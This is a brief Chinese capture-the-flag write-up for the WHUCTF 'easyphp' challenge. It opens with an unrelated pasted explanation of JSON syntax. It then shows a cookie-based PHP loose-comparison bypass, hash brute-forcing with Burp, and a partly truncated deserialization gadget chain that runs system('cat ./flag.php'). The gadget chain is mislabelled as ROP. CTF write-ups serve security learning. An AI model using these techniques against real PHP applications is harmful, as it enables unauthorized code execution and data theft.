WHUCTF easyphp代码审计

JSON 数据结构介绍：
按照最简单的形式，可以用下面这样的 JSON 表示 “名称 / 值对” ：{ "firstName": "Brett" } 等效的纯文本为firstName=Brett
但是，当将多个"名称 / 值对"串在一起时，JSON 就会体现出它的价值了。首先，可以创建包含多个"名称 / 值对"的 记录，比如：
{ "firstName": "Brett", "lastName":"McLaughlin", "email": "aaaa" }。从语法方面来看，这与"名称 / 值对"相比并没有很大的优势，但是在这种情况下 JSON 更容易使用，而且可读性更好。例如，它明确地表示以上三个值都是同一记录的一部分；花括号使这些值有了某种联系。

WHUCTF easyphp

首先这道题要先传入一个COOKIE,且COOKIE值为admin.后再admin中匹配{"hash": [\w\"]+}$

发现不存在COOKIE值，于是添加Cookie: admin={“hash”: 0}

发现了给了个提示，且提示的数字是**00111000100001100101001001000101**这个数字也就是ord(MD5($flag)[$i]
发现要判断这个是否相等($session_data['hash'] != strtoupper(MD5($flag)))，相等则继续进行。hash和MD5可以使用弱类型绕过。而后半部分的strtoupper(MD5($flag))这个值是固定的所以可以使用bp对hash值爆破。

当hash值为82时成功绕过。
后半部是一个反序列化的问题。构造ROP(返回导向编程)。即可执行cat ./flag.php成功获取flag
构造如下：

stu = new Evil();
    }
 
    function __destruct() {
        $this->stu->action();
    }
}
 
class Evil {
    function action() {
        system('cat ./flag.php');
    }
}
echo urlencode(serialize(new WHUCTF()));

将生成的值带入get查询，成功得到flag

参考链接：https://www.cnblogs.com/SkySoot/archive/2012/04/17/2453010.html